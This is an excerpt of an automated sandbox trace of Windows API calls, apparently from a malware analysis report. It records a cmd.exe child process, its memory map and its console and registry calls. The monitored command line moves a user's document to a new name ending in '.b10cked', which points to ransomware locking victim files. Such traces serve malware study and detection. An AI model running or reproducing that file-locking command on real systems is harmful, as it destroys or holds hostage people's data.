lpNewFilePointer=0x0) returned 1 [0235.402] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.402] ReadFile (in: hFile=0x54, lpBuffer=0x22ef98, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e188, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesRead=0x22e188*=0x200, lpOverlapped=0x0) returned 1 [0235.402] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.402] GetFileType (hFile=0x4c) returned 0x1 [0235.402] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0235.402] GetFileType (hFile=0x4c) returned 0x1 [0235.402] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.402] WriteFile (in: hFile=0x4c, lpBuffer=0x22ef98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.402] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.402] GetFileType (hFile=0x4c) returned 0x1 [0235.402] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.403] WriteFile (in: hFile=0x4c, lpBuffer=0x22efe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22efe8*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.403] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.403] GetFileType (hFile=0x4c) returned 0x1 [0235.403] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.403] WriteFile (in: hFile=0x4c, lpBuffer=0x22f038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f038*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.403] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.403] GetFileType (hFile=0x4c) returned 0x1 [0235.403] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.403] WriteFile (in: hFile=0x4c, lpBuffer=0x22f088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f088*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.403] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.403] GetFileType (hFile=0x4c) returned 0x1 [0235.403] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.403] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f0d8*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.403] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0235.403] GetFileType (hFile=0x4c) returned 0x1 [0235.403] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.403] WriteFile (in: hFile=0x4c, lpBuffer=0x22f128*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f128*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.403] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.403] GetFileType (hFile=0x4c) returned 0x1 [0235.404] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.404] WriteFile (in: hFile=0x4c, lpBuffer=0x22f178*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f178*, lpNumberOfBytesWritten=0x22e17c*=0x20, lpOverlapped=0x0) returned 1 [0235.404] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.404] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e168 | out: lpNewFilePointer=0x0) returned 1 [0235.404] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.404] ReadFile (in: hFile=0x54, lpBuffer=0x22ef98, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e188, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesRead=0x22e188*=0x200, lpOverlapped=0x0) returned 1 [0235.404] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.404] GetFileType (hFile=0x4c) returned 0x1 [0235.404] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.404] GetFileType (hFile=0x4c) returned 0x1 [0235.404] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.404] WriteFile (in: hFile=0x4c, lpBuffer=0x22ef98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.404] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.404] GetFileType (hFile=0x4c) returned 0x1 [0235.404] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.404] WriteFile (in: hFile=0x4c, lpBuffer=0x22efe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, 
lpOverlapped=0x0 | out: lpBuffer=0x22efe8*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.404] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.404] GetFileType (hFile=0x4c) returned 0x1 [0235.404] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.404] WriteFile (in: hFile=0x4c, lpBuffer=0x22f038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f038*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.404] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.404] GetFileType (hFile=0x4c) returned 0x1 [0235.404] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.404] WriteFile (in: hFile=0x4c, lpBuffer=0x22f088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f088*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.404] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.404] GetFileType (hFile=0x4c) returned 0x1 [0235.404] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.404] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f0d8*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.405] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.405] GetFileType (hFile=0x4c) returned 0x1 [0235.405] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.405] WriteFile (in: hFile=0x4c, lpBuffer=0x22f128*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f128*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.405] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.405] GetFileType (hFile=0x4c) returned 0x1 [0235.405] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.405] WriteFile (in: hFile=0x4c, lpBuffer=0x22f178*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: 
lpBuffer=0x22f178*, lpNumberOfBytesWritten=0x22e17c*=0x20, lpOverlapped=0x0) returned 1 [0235.405] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.405] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e168 | out: lpNewFilePointer=0x0) returned 1 [0235.405] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.405] ReadFile (in: hFile=0x54, lpBuffer=0x22ef98, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e188, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesRead=0x22e188*=0x32, lpOverlapped=0x0) returned 1 [0235.405] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.405] GetFileType (hFile=0x4c) returned 0x1 [0235.405] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.405] GetFileType (hFile=0x4c) returned 0x1 [0235.405] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.405] WriteFile (in: hFile=0x4c, lpBuffer=0x22ef98*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesWritten=0x22e17c*=0x32, lpOverlapped=0x0) returned 1 [0235.405] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.405] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e168 | out: lpNewFilePointer=0x0) returned 1 [0235.405] _close (_FileHandle=4) returned 0 [0235.405] FindNextFileW (in: hFindFile=0x410e90, lpFindFileData=0x22f1fc | out: lpFindFileData=0x22f1fc) returned 0 [0235.406] GetLastError () returned 0x12 [0235.406] FindClose (in: hFindFile=0x410e90 | out: hFindFile=0x410e90) returned 1 [0235.406] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0235.406] _close (_FileHandle=3) returned 0 [0235.407] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.407] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0235.407] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.407] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0235.407] _get_osfhandle 
(_FileHandle=0) returned 0x3 [0235.407] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0235.407] SetConsoleInputExeNameW () returned 0x1 [0235.407] GetConsoleOutputCP () returned 0x1b5 [0235.407] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.407] SetThreadUILanguage (LangId=0x0) returned 0x409 [0235.407] exit (_Code=0) Process: id = "634" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c60" os_pid = "0x998" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\GAY66U~1.OTS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\gaY66uwM4.ots.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35048 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35049 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 35050 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35051 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 35052 start_va = 0x49fb0000 end_va = 0x49ffbfff entry_point = 
0x49fb0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 35053 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35054 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35055 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35056 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 35057 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35426 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35427 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35428 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 35429 start_va = 0x2b0000 end_va = 0x316fff entry_point = 0x2b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35430 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 35431 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = 
mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35432 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35433 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35434 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35435 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35436 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35437 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35438 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35439 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35440 start_va = 0x3e0000 end_va = 0x4a7fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000003e0000" filename = "" Region: id = 35441 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35442 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35443 start_va = 0x150000 end_va = 0x156fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 35444 start_va = 0x160000 end_va = 0x161fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 35445 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 35446 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 35447 start_va = 0x4b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 35448 start_va = 0x5c0000 end_va = 0x11bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 35449 start_va = 0x11c0000 end_va = 0x1322fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011c0000" filename = "" Thread: id = 874 os_tid = 0xb18 [0235.068] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fb4c | out: lpSystemTimeAsFileTime=0x14fb4c*(dwLowDateTime=0xbf91e7c0, dwHighDateTime=0x1d440a9)) [0235.068] GetCurrentProcessId () returned 0x998 [0235.068] GetCurrentThreadId () returned 0xb18 [0235.068] GetTickCount () returned 0x408b6 [0235.068] QueryPerformanceCounter (in: lpPerformanceCount=0x14fb44 | out: 
lpPerformanceCount=0x14fb44*=29185741968) returned 1 [0235.069] GetModuleHandleA (lpModuleName=0x0) returned 0x49fb0000 [0235.069] __set_app_type (_Type=0x1) [0235.069] __p__fmode () returned 0x76b331f4 [0235.069] __p__commode () returned 0x76b331fc [0235.069] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49fd21a6) returned 0x0 [0235.069] __getmainargs (in: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c, _DoWildCard=0, _StartInfo=0x49fd4140 | out: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c) returned 0 [0235.069] GetCurrentThreadId () returned 0xb18 [0235.069] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb18) returned 0x38 [0235.069] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0235.069] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0235.069] SetThreadUILanguage (LangId=0x0) returned 0x409 [0235.070] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0235.070] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14fadc | out: phkResult=0x14fadc*=0x0) returned 0x2 [0235.070] VirtualQuery (in: lpAddress=0x14fb13, lpBuffer=0x14faac, dwLength=0x1c | out: lpBuffer=0x14faac*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0235.070] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14faac, dwLength=0x1c | out: lpBuffer=0x14faac*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0235.070] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14faac, dwLength=0x1c | out: lpBuffer=0x14faac*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) 
returned 0x1c [0235.070] VirtualQuery (in: lpAddress=0x53000, lpBuffer=0x14faac, dwLength=0x1c | out: lpBuffer=0x14faac*(BaseAddress=0x53000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0235.070] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14faac, dwLength=0x1c | out: lpBuffer=0x14faac*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, RegionSize=0x7000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0235.070] GetConsoleOutputCP () returned 0x1b5 [0235.070] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.070] SetConsoleCtrlHandler (HandlerRoutine=0x49fce72a, Add=1) returned 1 [0235.070] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.070] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0235.071] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.071] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0235.071] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.071] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0235.071] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.071] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0235.071] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.071] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0235.071] GetEnvironmentStringsW () returned 0x1c0198* [0235.071] FreeEnvironmentStringsW (penv=0x1c0198) returned 1 [0235.072] GetEnvironmentStringsW () returned 0x1c0198* [0235.072] FreeEnvironmentStringsW (penv=0x1c0198) returned 1 [0235.072] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14ea4c | out: phkResult=0x14ea4c*=0x40) returned 0x0 [0235.072] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14ea54, 
lpData=0x14ea58, lpcbData=0x14ea50*=0x1000 | out: lpType=0x14ea54*=0x0, lpData=0x14ea58*=0xc0, lpcbData=0x14ea50*=0x1000) returned 0x2 [0235.072] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14ea54, lpData=0x14ea58, lpcbData=0x14ea50*=0x1000 | out: lpType=0x14ea54*=0x4, lpData=0x14ea58*=0x1, lpcbData=0x14ea50*=0x4) returned 0x0 [0235.072] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14ea54, lpData=0x14ea58, lpcbData=0x14ea50*=0x1000 | out: lpType=0x14ea54*=0x0, lpData=0x14ea58*=0x1, lpcbData=0x14ea50*=0x1000) returned 0x2 [0235.072] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14ea54, lpData=0x14ea58, lpcbData=0x14ea50*=0x1000 | out: lpType=0x14ea54*=0x4, lpData=0x14ea58*=0x0, lpcbData=0x14ea50*=0x4) returned 0x0 [0235.072] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14ea54, lpData=0x14ea58, lpcbData=0x14ea50*=0x1000 | out: lpType=0x14ea54*=0x4, lpData=0x14ea58*=0x40, lpcbData=0x14ea50*=0x4) returned 0x0 [0235.072] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14ea54, lpData=0x14ea58, lpcbData=0x14ea50*=0x1000 | out: lpType=0x14ea54*=0x4, lpData=0x14ea58*=0x40, lpcbData=0x14ea50*=0x4) returned 0x0 [0235.072] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14ea54, lpData=0x14ea58, lpcbData=0x14ea50*=0x1000 | out: lpType=0x14ea54*=0x0, lpData=0x14ea58*=0x40, lpcbData=0x14ea50*=0x1000) returned 0x2 [0235.072] RegCloseKey (hKey=0x40) returned 0x0 [0235.072] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14ea4c | out: phkResult=0x14ea4c*=0x40) returned 0x0 [0235.072] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14ea54, lpData=0x14ea58, lpcbData=0x14ea50*=0x1000 | out: lpType=0x14ea54*=0x0, 
lpData=0x14ea58*=0x40, lpcbData=0x14ea50*=0x1000) returned 0x2 [0235.072] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14ea54, lpData=0x14ea58, lpcbData=0x14ea50*=0x1000 | out: lpType=0x14ea54*=0x4, lpData=0x14ea58*=0x1, lpcbData=0x14ea50*=0x4) returned 0x0 [0235.072] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14ea54, lpData=0x14ea58, lpcbData=0x14ea50*=0x1000 | out: lpType=0x14ea54*=0x0, lpData=0x14ea58*=0x1, lpcbData=0x14ea50*=0x1000) returned 0x2 [0235.072] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14ea54, lpData=0x14ea58, lpcbData=0x14ea50*=0x1000 | out: lpType=0x14ea54*=0x4, lpData=0x14ea58*=0x0, lpcbData=0x14ea50*=0x4) returned 0x0 [0235.072] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14ea54, lpData=0x14ea58, lpcbData=0x14ea50*=0x1000 | out: lpType=0x14ea54*=0x4, lpData=0x14ea58*=0x9, lpcbData=0x14ea50*=0x4) returned 0x0 [0235.072] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14ea54, lpData=0x14ea58, lpcbData=0x14ea50*=0x1000 | out: lpType=0x14ea54*=0x4, lpData=0x14ea58*=0x9, lpcbData=0x14ea50*=0x4) returned 0x0 [0235.072] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14ea54, lpData=0x14ea58, lpcbData=0x14ea50*=0x1000 | out: lpType=0x14ea54*=0x0, lpData=0x14ea58*=0x9, lpcbData=0x14ea50*=0x1000) returned 0x2 [0235.072] RegCloseKey (hKey=0x40) returned 0x0 [0235.072] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c2 [0235.072] srand (_Seed=0x5b8863c2) [0235.072] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\GAY66U~1.OTS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\gaY66uwM4.ots.b10cked\"" [0235.072] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y 
\"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\GAY66U~1.OTS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\gaY66uwM4.ots.b10cked\"" [0235.073] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.073] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1c18f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0235.073] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0235.073] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0235.073] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0235.073] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0235.073] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0235.073] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0235.074] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0235.074] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0235.074] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0235.074] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0235.074] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0235.074] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0235.074] GetEnvironmentStringsW () returned 0x1c22e8* 